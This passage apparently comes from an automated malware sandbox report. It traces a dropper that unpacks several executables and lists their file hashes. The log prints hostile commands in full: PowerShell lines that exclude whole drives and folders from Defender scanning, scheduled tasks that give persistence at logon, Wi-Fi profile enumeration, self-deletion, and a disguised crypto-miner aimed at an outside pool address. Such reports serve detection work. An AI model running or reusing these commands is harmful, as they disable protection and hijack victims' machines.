Vu.exe cmd.exe PID 1512 wrote to memory of 2588 1512 Vu.exe cmd.exe PID 2588 wrote to memory of 2624 2588 cmd.exe powershell.exe PID 2588 wrote to memory of 2624 2588 cmd.exe powershell.exe PID 2588 wrote to memory of 2624 2588 cmd.exe powershell.exe PID 324 wrote to memory of 2636 324 cmd.exe powershell.exe PID 324 wrote to memory of 2636 324 cmd.exe powershell.exe PID 324 wrote to memory of 2636 324 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a71f91351dc1bb57f0426080f2c03854.exe"C:\Users\Admin\AppData\Local\Temp\a71f91351dc1bb57f0426080f2c03854.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\python\python.exe"C:\Users\Admin\AppData\Local\Temp\python\python.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\python\python.exe"C:\Users\Admin\AppData\Local\Temp\python\python.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exe"C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "asasasas" /tr '"C:\Users\Admin\AppData\Local\Temp\asasasas.exe"' & exit3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "asasasas" /tr '"C:\Users\Admin\AppData\Local\Temp\asasasas.exe"'4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpFB5F.tmp.bat""3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\asasasas.exe"C:\Users\Admin\AppData\Local\Temp\asasasas.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exe"C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"' & exit3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"'4⤵
- Creates scheduled task(s)
-
C:\windows\system32\defendernottray.exe"C:\windows\system32\defendernottray.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"' & exit4⤵
-
\??\c:\windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"'5⤵
- Creates scheduled task(s)
-
C:\windows\system32\microsoft\libs\sihost64.exe"C:\windows\system32\microsoft\libs\sihost64.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
-
C:\windows\system32\defendernottray.exe"C:\windows\system32\defendernottray.exe"5⤵
- Executes dropped EXE
-
C:\windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'7⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'7⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=67.242.2.35:3333 --user=CMRBKYMNO --pass= --cpu-max-threads-hint=70 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CJ80EuZhDq7w3QiPw3/9PYjASC1sXGu0nCxs9jooG2T" --cinit-idle-wait=12 --cinit-idle-cpu=90 --nicehash --cinit-stealth4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exe"C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"' & exit3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"'4⤵
- Creates scheduled task(s)
-
C:\windows\system32\trayfontdefender.exe"C:\windows\system32\trayfontdefender.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"' & exit4⤵
-
\??\c:\windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "trayfontdefender" /tr '"c:\windows\system32\trayfontdefender.exe"'5⤵
- Creates scheduled task(s)
-
C:\windows\system32\microsoft\telemetry\sihost32.exe"C:\windows\system32\microsoft\telemetry\sihost32.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe"C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vorxrfpg.cmdline"3⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE5DD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE5DC.tmp"4⤵
-
C:\Windows\SysWOW64\WindowsInput.exe"C:\Windows\SysWOW64\WindowsInput.exe" --install3⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\lsddsds\lsdds.exe"C:\Windows\lsddsds\lsdds.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\olsdd.exe"C:\Users\Admin\AppData\Local\Temp\olsdd.exe" /launchSelfAndExit "C:\Windows\lsddsds\lsdds.exe" 2416 /protectFile4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\olsdd.exe"C:\Users\Admin\AppData\Local\Temp\olsdd.exe" /watchProcess "C:\Windows\lsddsds\lsdds.exe" 2416 "/protectFile"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe"C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe"2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid3⤵
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid4⤵
-
C:\Windows\system32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
-
C:\Windows\system32\findstr.exefindstr All4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe"3⤵
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
C:\Windows\system32\PING.EXEping 127.0.0.14⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exe"C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1492 -s 4803⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsInput.exe"C:\Windows\SysWOW64\WindowsInput.exe"1⤵
- Executes dropped EXE
-
C:\Windows\system32\taskeng.exetaskeng.exe {4063E9A0-34CA-4360-B09F-AC96096D5D3F} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]1⤵
-
C:\Windows\lsddsds\lsdds.exeC:\Windows\lsddsds\lsdds.exe2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2b5c018f-f13c-427a-86be-0422a66de417MD5
e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_476725f0-e593-4b69-b8a3-7dfed1307544MD5
d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_53b282cd-9512-4708-b0e8-a7f328b43aa4MD5
7f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_90447770-304d-4457-b662-fc5a01a588beMD5
faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_945f6233-6337-4003-96a0-416b9b70062cMD5
2d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_94678191-e0ce-4820-a36c-d6440b997741MD5
6f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e5759ee6-c4d2-47ab-b117-577e85427cdfMD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
8b8a272fb566391acc4906742ebbbad4
SHA1f6a5ff8a4f8ac0f48bfa3a5fcb5b8546f2f8fbc4
SHA25694b7a9cf77ffce575fa2de5c9c15bf50e04dbc8faabdba3d7d4b41871be2f3ee
SHA5122b1a18880c95793000dc5e9a866a0a016f76309ed42d1692e13583c210fc0050bc1188d4c58a34544e9beb7c6943b05222a9c4157139224a1a7183fe04744ee5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
bd3f591faed565b950a3204c7aaf7508
SHA1168b9b244e80649aae70d951d347e75cd8de7da0
SHA256a78199f7f5ec605907e95801dd55d5798ef39027cd8d6dc894d153163dedf195
SHA51229e89cb43f551f6463f8e90fb1c42aa5969ea86d3f5cf5aab78feb52c1b457d3bbeec9494b040f460b956a162a25d36ada94183f6391c2458ed69c6393b6f666
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
bd3f591faed565b950a3204c7aaf7508
SHA1168b9b244e80649aae70d951d347e75cd8de7da0
SHA256a78199f7f5ec605907e95801dd55d5798ef39027cd8d6dc894d153163dedf195
SHA51229e89cb43f551f6463f8e90fb1c42aa5969ea86d3f5cf5aab78feb52c1b457d3bbeec9494b040f460b956a162a25d36ada94183f6391c2458ed69c6393b6f666
-
C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exeMD5
f66e55cb2019425ba694948cc0355560
SHA130d2e88f4da43baa0055ce592bbdbd13e0f7244a
SHA2568439ef55f6eabc62d3c9d4a3cfe1ef042b48e6718c61bc0d834084b8c1b8bbe7
SHA512e3c00a56758a26ea786b030fcd6ab6cb42282d252cca6d07003639354fb35f9444f6cc535f3b0bf02d8426b88d4b18edec506644d4b2d2a6fe792d3b93bbaa23
-
C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exeMD5
f66e55cb2019425ba694948cc0355560
SHA130d2e88f4da43baa0055ce592bbdbd13e0f7244a
SHA2568439ef55f6eabc62d3c9d4a3cfe1ef042b48e6718c61bc0d834084b8c1b8bbe7
SHA512e3c00a56758a26ea786b030fcd6ab6cb42282d252cca6d07003639354fb35f9444f6cc535f3b0bf02d8426b88d4b18edec506644d4b2d2a6fe792d3b93bbaa23
-
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exeMD5
ad8e052d00bfc89e09c047f048ea63da
SHA1c1d0dba06f790d20794039970fe61d94479ee6f9
SHA256ccecc3771947e3767dc9b0eb36f34886237e5c3aca60de94a610a6d81f93f9ab
SHA512b8ba4b34279406939df8d37a6934b9f406e782fc9202b825cd34d4c9e4e6d70748505a6aadc0ed2d114d8f2220cd80b83780909fe582781981f842fbbb79909b
-
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exeMD5
ad8e052d00bfc89e09c047f048ea63da
SHA1c1d0dba06f790d20794039970fe61d94479ee6f9
SHA256ccecc3771947e3767dc9b0eb36f34886237e5c3aca60de94a610a6d81f93f9ab
SHA512b8ba4b34279406939df8d37a6934b9f406e782fc9202b825cd34d4c9e4e6d70748505a6aadc0ed2d114d8f2220cd80b83780909fe582781981f842fbbb79909b
-
C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exeMD5
2ed63566ece20dbdfbb8bed11e075ddc
SHA1b7d411fa43c83fceabc557368edab88c23b0a5c7
SHA256a7c70d3c35b9776c8ca407bb26250435b8e3beeedcc213b7fe6d98f12ca2a99a
SHA512a5787d3aaf3f9abf9b09d25c25aa95b3735c7f8a26eeef8775f58349dc6266dac032c36b602236197b553c61bb4958cdd8091047171a895d107aca89f8e2ec69
-
C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exeMD5
2ed63566ece20dbdfbb8bed11e075ddc
SHA1b7d411fa43c83fceabc557368edab88c23b0a5c7
SHA256a7c70d3c35b9776c8ca407bb26250435b8e3beeedcc213b7fe6d98f12ca2a99a
SHA512a5787d3aaf3f9abf9b09d25c25aa95b3735c7f8a26eeef8775f58349dc6266dac032c36b602236197b553c61bb4958cdd8091047171a895d107aca89f8e2ec69
-
C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exeMD5
1396c4279e7dd5e24be782c88871fed3
SHA1f3d1eca6c761a69e25c6aa592116edbb817a8aad
SHA2566bba280d029817a29af0dce3a7d6676e2105e467d292ffe78e4d869e2dd51310
SHA512331bbc4095c76067ace0bd78c4d317f8cb92e5989138ec02f32d4b51b8ec69cde4bd4149c85712a3356e4967cc99be0478487d91166cb562cc169294287118c3
-
C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exeMD5
1396c4279e7dd5e24be782c88871fed3
SHA1f3d1eca6c761a69e25c6aa592116edbb817a8aad
SHA2566bba280d029817a29af0dce3a7d6676e2105e467d292ffe78e4d869e2dd51310
SHA512331bbc4095c76067ace0bd78c4d317f8cb92e5989138ec02f32d4b51b8ec69cde4bd4149c85712a3356e4967cc99be0478487d91166cb562cc169294287118c3
-
C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exeMD5
5ec2741199ca8f45f24e4d1f943df63d
SHA1c72b4d4ca24bee746106611268ff1b85461aa561
SHA256444fd5ca27eece8893d52dffa5f94a149175d6bc8904a109009506b03dc4e6b3
SHA512e48545dbf9b1df4ca20b964a90358a01fcbd2f7ec7af0fdc03e4a42074ae490c646b0b4b091775ff7c88a33361e72d3794df6cbbfb450ca7f68f0f12f58de523
-
C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exeMD5
5ec2741199ca8f45f24e4d1f943df63d
SHA1c72b4d4ca24bee746106611268ff1b85461aa561
SHA256444fd5ca27eece8893d52dffa5f94a149175d6bc8904a109009506b03dc4e6b3
SHA512e48545dbf9b1df4ca20b964a90358a01fcbd2f7ec7af0fdc03e4a42074ae490c646b0b4b091775ff7c88a33361e72d3794df6cbbfb450ca7f68f0f12f58de523
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exeMD5
32f61892924acfadb0a93c3fdbdde02f
SHA1dc9f82ec9db0225cbf88521739160a31b15d4a9e
SHA25669caa272a055b744747240f437b420f5706b607dca1fd9b1297c0499052fc9c5
SHA512f378b36f5723bc4000e3e880014b0cd37ae4fb6070a5aebc711a047b49f2e3f9e9fa5e09b818010b58b36d38c79002f63d0ee2beb6ceb821cbb52d97f9549f37
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exeMD5
32f61892924acfadb0a93c3fdbdde02f
SHA1dc9f82ec9db0225cbf88521739160a31b15d4a9e
SHA25669caa272a055b744747240f437b420f5706b607dca1fd9b1297c0499052fc9c5
SHA512f378b36f5723bc4000e3e880014b0cd37ae4fb6070a5aebc711a047b49f2e3f9e9fa5e09b818010b58b36d38c79002f63d0ee2beb6ceb821cbb52d97f9549f37
-
C:\Users\Admin\AppData\Local\Temp\_MEI17482\python39.dllMD5
5cd203d356a77646856341a0c9135fc6
SHA1a1f4ac5cc2f5ecb075b3d0129e620784814a48f7
SHA256a56afcf5f3a72769c77c3bc43c9b84197180a8b3380b6258073223bfd72ed47a
SHA512390008d57fa711d7c88b77937bf16fdb230e7c1e7182faea6d7c206e9f65ced6f2e835f9da9befb941e80624abe45875602e0e7ad485d9a009d2450a2a0e0f1f
-
C:\Users\Admin\AppData\Local\Temp\python\python.exeMD5
97a51fcdffeac1ea53ede5c91607a73e
SHA11c95c43b104a7faa79691714556c2c7b5d153697
SHA2560c9267d62f9679a99459ad7c2234e247c7b8724d069412ed6b8c58134e392c26
SHA512e2cffc1eb6dc628d113337c4e4a2100242ad5d0d2ebb3a0cbda855e978cf4337fd91f0d85c00f0c80f05a58b9069e4016d5ec8af5d8b6c4f8cd94bb190768fe7
-
C:\Users\Admin\AppData\Local\Temp\python\python.exeMD5
97a51fcdffeac1ea53ede5c91607a73e
SHA11c95c43b104a7faa79691714556c2c7b5d153697
SHA2560c9267d62f9679a99459ad7c2234e247c7b8724d069412ed6b8c58134e392c26
SHA512e2cffc1eb6dc628d113337c4e4a2100242ad5d0d2ebb3a0cbda855e978cf4337fd91f0d85c00f0c80f05a58b9069e4016d5ec8af5d8b6c4f8cd94bb190768fe7
-
C:\Users\Admin\AppData\Local\Temp\python\python.exeMD5
97a51fcdffeac1ea53ede5c91607a73e
SHA11c95c43b104a7faa79691714556c2c7b5d153697
SHA2560c9267d62f9679a99459ad7c2234e247c7b8724d069412ed6b8c58134e392c26
SHA512e2cffc1eb6dc628d113337c4e4a2100242ad5d0d2ebb3a0cbda855e978cf4337fd91f0d85c00f0c80f05a58b9069e4016d5ec8af5d8b6c4f8cd94bb190768fe7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
fb5552899068bced50732aba0188caa8
SHA1a0433c6aec9d0a39d57eb9ddd98b2009e314367d
SHA256edc8c78e8ce4a155efc4e838f2c22edac8f510c5f57e164ee5eef29632b9c2e8
